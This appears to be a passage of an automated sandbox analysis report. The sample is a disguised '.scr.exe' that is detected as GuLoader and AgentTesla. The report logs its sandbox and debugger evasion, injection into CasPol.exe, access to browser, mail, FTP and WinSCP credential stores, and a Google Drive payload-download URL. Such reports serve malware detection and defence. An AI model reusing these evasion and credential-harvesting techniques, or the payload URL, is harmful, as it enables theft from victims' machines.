Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior

Data Obfuscation:

barindex
Yara detected GuLoader
Source: Yara match File source: 00000006.00000000.44493194249.0000000000F00000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe Code function: 1_2_0040756B push 934A6E33h; ret 1_2_00407576
Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe Code function: 1_2_0040611D push 9754E4D4h; ret 1_2_00406122
Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe Code function: 1_2_00409A3E push B1F2CAE9h; ret 1_2_00409A4D
Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe Code function: 1_2_00405B8B push cs; retf 1_2_00405B8D
Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe Code function: 1_2_023322C1 push cs; iretd 1_2_023322C2
Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe Code function: 1_2_02332716 push es; iretd 1_2_0233284C
Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe Code function: 1_2_02332B57 push es; iretd 1_2_02332B58
Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe Code function: 1_2_0233281E push es; iretd 1_2_0233284C
Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe Code function: 1_2_02334470 pushfd ; iretd 1_2_02334471
Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe Code function: 1_2_023334C5 push ebp; retf 1_2_023334C8
Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe Code function: 1_2_023349C1 pushfd ; iretd 1_2_023349C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_1CF65658 pushfd ; retf 6_2_1CF65659
Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect Any.run
Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: Scanned Payment Copy00024.scr.exe, 00000001.00000002.44679766383.00000000039F0000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32APPDATA=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXE\SYSWOW64\MSVBVM60.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXE\SYSWOW64\MSVBVM60.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXE\SYSWOW64\MSVBVM60.DLL
Source: CasPol.exe, 00000006.00000002.49382267477.0000000000B50000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32APPDATA=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1IINS60L202FEGNX6V3EUFJEUKV3OYNXZ
Source: Scanned Payment Copy00024.scr.exe, 00000001.00000002.44679766383.00000000039F0000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.49382267477.0000000000B50000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: Scanned Payment Copy00024.scr.exe, 00000001.00000002.44677293770.0000000000643000.00000004.00000020.sdmp Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6908 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Contains long sleeps (>= 3 min)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Window / User API: threadDelayed 9947 Jump to behavior
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe System information queried: ModuleInformation Jump to behavior
Source: Scanned Payment Copy00024.scr.exe, 00000001.00000002.44679850654.0000000003AB9000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.49385615222.0000000002D29000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: Scanned Payment Copy00024.scr.exe, 00000001.00000002.44679850654.0000000003AB9000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.49385615222.0000000002D29000.00000004.00000001.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: CasPol.exe, 00000006.00000002.49385615222.0000000002D29000.00000004.00000001.sdmp Binary or memory string: vmicshutdown
Source: Scanned Payment Copy00024.scr.exe, 00000001.00000002.44679850654.0000000003AB9000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.49385615222.0000000002D29000.00000004.00000001.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: Scanned Payment Copy00024.scr.exe, 00000001.00000002.44679766383.00000000039F0000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32APPDATA=windir=\Microsoft.NET\Framework\v4.0.30319\caspol.exe\syswow64\msvbvm60.dllwindir=\Microsoft.NET\Framework\v4.0.30319\caspol.exe\syswow64\msvbvm60.dllwindir=\Microsoft.NET\Framework\v4.0.30319\caspol.exe\syswow64\msvbvm60.dll
Source: Scanned Payment Copy00024.scr.exe, 00000001.00000002.44679850654.0000000003AB9000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.49385615222.0000000002D29000.00000004.00000001.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: Scanned Payment Copy00024.scr.exe, 00000001.00000002.44679850654.0000000003AB9000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.49385615222.0000000002D29000.00000004.00000001.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: CasPol.exe, 00000006.00000002.49385615222.0000000002D29000.00000004.00000001.sdmp Binary or memory string: vmicvss
Source: CasPol.exe, 00000006.00000003.45582358032.000000000111A000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.49383620135.000000000111A000.00000004.00000020.sdmp, CasPol.exe, 00000006.00000002.49383099264.00000000010A6000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW
Source: CasPol.exe, 00000006.00000002.49382267477.0000000000B50000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32APPDATA=https://drive.google.com/uc?export=download&id=1iiNs60l202FEGNx6v3EUfjeUKv3OYnXz
Source: Scanned Payment Copy00024.scr.exe, 00000001.00000002.44679766383.00000000039F0000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.49382267477.0000000000B50000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: Scanned Payment Copy00024.scr.exe, 00000001.00000002.44679850654.0000000003AB9000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.49385615222.0000000002D29000.00000004.00000001.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: Scanned Payment Copy00024.scr.exe, 00000001.00000002.44679850654.0000000003AB9000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.49385615222.0000000002D29000.00000004.00000001.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: Scanned Payment Copy00024.scr.exe, 00000001.00000002.44679850654.0000000003AB9000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.49385615222.0000000002D29000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: Scanned Payment Copy00024.scr.exe, 00000001.00000002.44677293770.0000000000643000.00000004.00000020.sdmp Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe
Source: CasPol.exe, 00000006.00000002.49385615222.0000000002D29000.00000004.00000001.sdmp Binary or memory string: vmicheartbeat

Anti Debugging:

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread information set: HideFromDebugger Jump to behavior
Enables debug privileges
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process token adjusted: Debug Jump to behavior
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_00E46950 LdrInitializeThunk, 6_2_00E46950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Writes to foreign memory regions
Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: F00000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe" Jump to behavior
Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe" Jump to behavior
Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe" Jump to behavior
Source: CasPol.exe, 00000006.00000002.49385182683.00000000018D0000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: CasPol.exe, 00000006.00000002.49385182683.00000000018D0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: CasPol.exe, 00000006.00000002.49385182683.00000000018D0000.00000002.00020000.sdmp Binary or memory string: Progman
Source: CasPol.exe, 00000006.00000002.49385182683.00000000018D0000.00000002.00020000.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected AgentTesla
Source: Yara match File source: 00000006.00000002.49393551309.000000001DF21000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 1428, type: MEMORYSTR
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\ Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000006.00000002.49393551309.000000001DF21000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 1428, type: MEMORYSTR

Remote Access Functionality:

barindex
Yara detected AgentTesla
Source: Yara match File source: 00000006.00000002.49393551309.000000001DF21000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 1428, type: MEMORYSTR
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs